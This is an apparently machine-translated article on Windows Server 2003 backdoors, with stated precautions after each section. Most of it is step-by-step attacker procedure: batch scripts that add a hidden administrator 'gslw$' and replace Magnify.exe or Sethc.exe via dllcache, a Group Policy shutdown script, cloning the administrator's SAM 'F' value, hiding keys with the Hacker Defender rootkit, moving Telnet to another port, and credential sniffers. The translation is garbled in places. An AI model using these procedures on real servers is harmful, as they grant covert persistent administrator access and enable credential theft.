Shocked! WIN2003 existence Backdoor Daquan, the right to raise the success rate high

In a sense, the server is being attacked is inevitable, even controlled is understandable. But it is absolutely intolerable that the server is implanted into the backdoor, the attacker forcefully, and the manager goes unaware. This article will be the current more popular backdoor technology analysis, the enemy can eliminate the back door.

1. Magnifying Glass back door
Magnifier (Magnify.exe) is a small tool for Windows 2000/xp/2003 System integration and is designed for the convenience of visually impaired users. The tool can be called through the "Win+u" key combination before the user logs on to the system, so the attacker will be able to control the server by replacing the Magnifier program with a carefully constructed Magnify.exe file with the same name.
Typically, an attacker creates an administrator user by constructing a magnify.exe program and then logs on to the system. Of course, sometimes they also invoke the command prompt (Cmd.exe) or the system shell (Explorer.exe) directly. It is necessary to note that the program that is called is the system permission, which is the highest privilege. However, just in case when an administrator discovers a flaw while running the Magnifier program, the attacker typically finishes the required action through the constructor, eventually running a real Magnifier program to deceive the administrator. It is used in the following ways:
(1). construct a batch script
@echo off
NET user gslw$ Test168/add
net localgroup Administrators gslw$/add
%windir%\system32\nagnify.exe
Exit saves the above script as Magnify.bat, which is to create a password for test168 administrator user gslw$, and finally run the renamed Magnifier program Nagnify.exe. (Fig. 1)
(2). file format Conversion
Because the Magnify.bat suffix of the batch file is bat, it must be converted to an EXE file of the same name before it can be called by a composite key win+u. An attacker can usually use WinRAR to construct an automatically unzipped exe compressed file, and of course can use bat2com, Com2exe for file format conversion. We will take the following example to demonstrate.
Open the command line, enter the directory where the bat2com, Com2exe tools are located, and then run the command "bat2com magnify.bat" to convert Magnify.bat to magnify.com and continue running the command "Com2exe magnify.com" Convert the magnify.com to Magnify.exe so that the batch file is converted to a program file with the same name as the Magnifier program. (Fig. 2)
(3). magnifier File Replacement
You need to replace the Magnifier program file with the same name with the constructed Magnify.exe, because Windows is self-protected against system files and therefore cannot be replaced directly, but Windows provides a command replace.exe that allows us to replace the system files. In addition, since the system files are backed up in%windir%\system32\dllcache, in order to prevent the file from being replaced and re-restored, all we first have to replace the Magnify.exe file in that directory. Assuming that the constructed Magnify.exe file is in the%windir% directory, we can implement a file substitution with a batch process.

@echo off
Copy%windir%\system32\dllcache\magnify.exe Nagnify.exe
Copy%windir%\system32\magnify.exe Nagnify.exe
Replace.exe%windir%\magnify.exe%windir%\system32\dllcache
Replace.exe%windir%\magnify.exe%windir%\system32
Exit the above batch function is to first back up the Magnifier program to Nagnify.exe, and then replace it with the constructor of the same name. (Fig. 3)
(4). Attack exploits
When the above operation is done, a magnifying glass door is made. Then the attacker through the Remote Desktop Connection server, in the Login screen window press the local keyboard "Win+u" key combination, select the "Magnifier" running it, at the moment on the server created an administrator user gslw$ and opened the Magnifier tool, then the attacker will open the account to log on to the server. Of course, an attacker would remove all information related to that account before disconnecting from the login in case the administrator discovers it. (Fig. 4)
(5). Precautionary measures
Enter%windir%\system32\ to see if the Magnify.exe file icon is the original magnifying glass icon, if not, it is most likely to be implanted with a magnifying glass back door. Of course, sometimes an attacker would also change their file icon to the same icon as the original Magnifier program. At this point we can look at the size and modification time of the Magnify.exe file, if there is a discrepancy between the two is doubtful. We can also run Magnify.exe first and then run lusrmgr.msc to see if there are any suspicious users. If the server is determined to be placed a magnifying glass backdoor, first delete the file, and then restore the normal Magnifier program. Of course, we can do it more thoroughly and replace the Magnifier program with a trivial program. Even we can dose his own medicine and construct a magnify.exe to warn attackers or conduct intrusion monitoring and forensics.
Add: Similar to the magnifying glass back door, "sticky key" back door, that is, press the Shief key five times can start the Sticky key function, its use and precautions with the magnifying glass back door similar, just magnify.exe replaced with Sethc.exe.
2. Group Policy Backdoor
In contrast, the Group Policy backdoor is more covert. Adding corresponding key values to the book list running with system startup is a common trick of Trojan Horse, also known to everyone. In fact, this function can also be implemented in the most policy, not only so it can also implement some actions when the system shuts down. This is achieved through the most strategic script (startup/Shutdown) item. The exact location is under the "Computer Configuration →windows Settings" item. Because it is very covert, it is often used by attackers to do server backdoor.
By gaining control of the server, the attacker can implement long-term control of the host through this backdoor. It can run certain programs or scripts through the backdoor, the simplest of which is to create an administrator user who can do this:
(1). Create a script
Create a batch file the contents of Add.bat,add.bat are: @echo off & net user gslw$ Test168/add && netlocalgroup administrators gslw$/ad D & Exit (Create an administrator user named gslw$ password test168).
(2). Backdoor use
In the Run dialog box, enter Gpedit.msc, navigate to Computer Configuration >windows > Scripts (Startup/shutdown), and double-click Shut down in the right window to add Add.bat. This means that the gslw$ user is created when the system shuts down. For the general user is not aware that there is a hidden user in the system, that is, he saw and deleted the account, and when the system shuts down, the account is created. So, if the user doesn't know this place in Group Policy, he'll be puzzled.
In fact, there are many uses for this "backdoor" in Group Policy, where attackers run scripts or programs, sniff out administrator passwords, and so on. Once they have acquired the administrator's password, they do not have to create an account in the system and log in directly to the system using the Administrator account. Therefore, it is also a "double-edged sword", I hope everyone attaches importance to this place. When you are baffled by an attack on the server, it might be possible for an attacker to do so. (Fig. 5)
(3). Back door Guard
Group Policy Backdoor is an attacker who takes advantage of the administrator's negligence, because the "(Startup/Shutdown) script" item in Group Policy is often ignored, and some administrators do not even know this option in Group Policy. Guarding against this type of server backdoor is also very simple, just open the Group Policy tool and navigate to the "Scripts (startup/Shutdown)" Item to view. Of course, you can enter.
The System32\grouppolicy\machine\scripts\startup and System32\grouppolicy\machine\scripts\shutdown directories check for suspicious scripts. (Fig. 6)
3. Rootkit Backdoor
A rootkit is one or more toolkits that are used to hide and control the system, which is increasingly being used in some malicious software, and of course the attacker often makes the server backdoor. The following example is used to analyze its utilization method.
(1). Create a general account
At the command prompt (Cmd.exe), enter the following command: NET user gslw$ Test168/add
An ordinary user named gslw$ with a password of test168 is established by the above command. In order to achieve the initial hide we added the "$" number after the user name so that the user could not be seen through net user at the command prompt, but also under the "SAM" key for local Users and groups and their registry.
(2). Account non-conventional right to withdraw
Below we use the registry to power the gslw$ account, making it an administrative user that is more covert (not visible in the command line and local users and groups).
First step: Open Registry Editor and navigate to the Hkey_local_machine\sam\sam entry. Because the Administrators group has no operational permissions on the SAM item by default, we want to empower it. Right-click the key to select "Permissions", then add "Administrators" group, give it Full Control permission, and finally refresh the registry, you will be able to enter the relevant key values under the SAM key.
Step two: Navigate to the Registry Hkey_local_machine\sam\sam\domains\account\users entry and click "000001f4"
Registry key, double-click the "F" key value to its right, copy its value, and then tap the "00000404" registry key (which is not necessarily the same), double-click the "F" key value to the right of it and replace its value with the key value you just copied. (Fig. 7)
The third step: Export gslw$, 00000404 registry entries are 1.reg and 2.reg respectively. At the command line, enter the command "NET user gslw$/del" to delete the gslw$ user, then double-click 1.reg and 2.reg to import the registry, and finally cancel administrators access to the SAM registry key.
This promotes the gslw$ user to be an administrator, and the user is very secretive, except that the registry is not visible under commands and local Users and groups. Such a hidden super administrator user is often used by intruders, for a user who is not a very high level of administrator such as he is difficult to find. Such a user he does not belong to any group, but has administrator rights, is able to log on.
(3). Advanced Hidden Users
In summary, the gslw$ users we create are more subtle, but can be seen through the registry. Below we use the Rootkit tool for advanced hiding, that is, hiding the user in the registry.
The available rootkit tools are very numerous, and we are demonstrating with the hacker Defende crisis, which is a toolkit that contains a lot of tools that we hide registry key values only with two files, Hxdef100.exe and Hxdef100.ini. Where Hxdef100.ini is a configuration file, Hxdef100.exe is a program file. Open the Hxdef100.ini file to the [Hidden Regkeys] key, add the registry key values that we want to hide gslw$ and 00000404 that is, the user's entry in the registry and then save the exit. (Fig. 8)
Then double-click Run Hxdef100.exe to see that the gslw$ user's key value "disappears" in the registry, and the two files are "missing". This allows us to use the rootkit to realize the complete concealment of the senior Admin user, who is unaware of the presence of an administrator user in the system. (Fig. 9)
(4). Precautionary measures
Backdoors created by rootkits are hidden from them, and administrators who are created with them can never be discovered by administrators unless the rootkit is cleared. Let's remove the hacker Defende as an example to make the backdoor current.
Driver-level scanning: rootkits tend to be drive-level, so it's much closer to the bottom than normal applications, and it's more tricky to clean up. Clear please process scan is necessary, RootKit Hook Analyzer is a Rookit Analysis query tool that allows you to scan and analyze rookit programs that exist in your system. The tool is an English program, installed and run click on the bottom of its interface "Analyze" button can be scanned analysis, list the system Rookit program, tick "Show hooked services only" can be filtered values listed Rookit ervices. Of course, there are a lot of tools like this, we can choose according to our own needs. (Fig. 10)
View Hidden processes: Rootkit program processes are often hidden or embedded, and cannot be seen through Windows Task Manager. We can use a powerful process tool IceSword (ice blade) to view. Run IceSword Click the "Process" button to list the processes in the current system, where red shows suspicious processes. We can see the hxdef100.exe process impressively, which is really the rootkit we just ran. Right-click on the process to select the "End" process. At this time Hxdef100.exe and Hxdef100.ini files, and then refresh and view the registry, just disappeared two key values have been reproduced. (Fig. 11)
Professional tools Avira: The use of IceSword for rookit analysis and the end of its process is a way of anti-rookit, but sometimes the ice blade does not analyze the rootkit, so we need to compare professional tools. such as Kaspersky, Super Patrol is a good choice. Is the rootkit virus detected by Super Patrol. (Fig. 12)
4. Telnet Backdoor
Telnet is a remote login tool under the command line, but it is often overlooked by administrators when it is used in server management. If an attacker controls a server, turning on Remote Desktop for remote control is very easy for the administrator to detect, but starting Telnet for remote control is not easy to detect. However, the default port for Telnet is 23, and if it is turned on, it is easy for others to scan, so the attacker will change the port of Telnet to take control of the server.
(1). Modify Port
Modify the Telnet port for Windows 2003 server locally by opening the command prompt with "start → run" input cmd, and then running the command "tlntadmn config port=800" (800 is the modified telnet port, To avoid port collisions, do not set the port to a known service. Of course, we can also remotely modify the server's Telnet port, enter the command at the command prompt "tlntadmn config \\192.168.1.9 port=800-u gslw-p test168" (\\192.168.1.9 the other IP, port=800 the Telnet port to be modified,-u specifies the user name of the other,-p specifies the password of the other user. ) (Fig. 13)
(2). telnet
The attacker runs a command prompt locally (Cmd.exe) to enter the command "telnet 192.168.1.9 800" and then enter the user name and its password to log telnet to the server.
(3). Precautionary measures
The method for Telnet backdoor is very simple, you can change its port through the "tlntadmn config port=n" command, more thoroughly run "services.msc" to open Service Manager, disable Telnet service. (Fig. 14)
5. Sniff the back door
This type of backdoor is an attacker who, after controlling the server, does not create a new account but installs the sniffer tool on the server to steal the administrator's password. Because of this type of backdoor, instead of creating a new account and logging into the system by sniffing the administrator password, the concealment is extremely high and cannot be found if the administrator is not aware of security and lacks sufficient security skills.
(1). Install Sniffer tools
The attacker uploads or downloads the appropriate sniffer tool to the server and installs it. It should be explained that these sniffer tools are generally small and functional, but are often made into a driving form, so the concealment is very high, it is difficult to find and not to clear.
(2). Get the Administrator password
The sniffer tool monitors the system and the password is stolen when the administrator logs on to the server, and the Sniffer tool saves the administrator password to a TXT file. After the next time the attacker logs on to the server, you can open the TXT file to get the administrator password. He then logs on to the server and does not re-create the account, but directly logs in to the server with a legitimate administrator account. If the server is a web, the attacker would place the TXT file under a web directory and then browse to the file locally. (Fig. 15)
(3). Precautionary measures
Sniffing backdoor attackers log on to the server with a normal administrator account, so it's hard to see, but any intrusion can leave a trace, we could enable the audit policy in Group Policy to log the user's login, and then through the Event Viewer, see if there was an illegal login with suspicious time. However, a smart attacker would delete or modify the system log, so the most thorough step was to clear the Sniffer tool installed on the server and then change the administrator password.
Summary: Above we have analyzed in detail five kinds of server backdoor technology, and provided the precautionary measures. To fundamentally prevent backdoor, the administrator to do the security of the server deployment, timely system updates do not give attackers the opportunity to leave the backdoor. Of course, even if the server is placed in the back door, no matter how clever the technology used, as long as the vigilance to grasp a certain security skills can make the backdoor current

Shocked! WIN2003 existence Backdoor Daquan, the right to raise the success rate high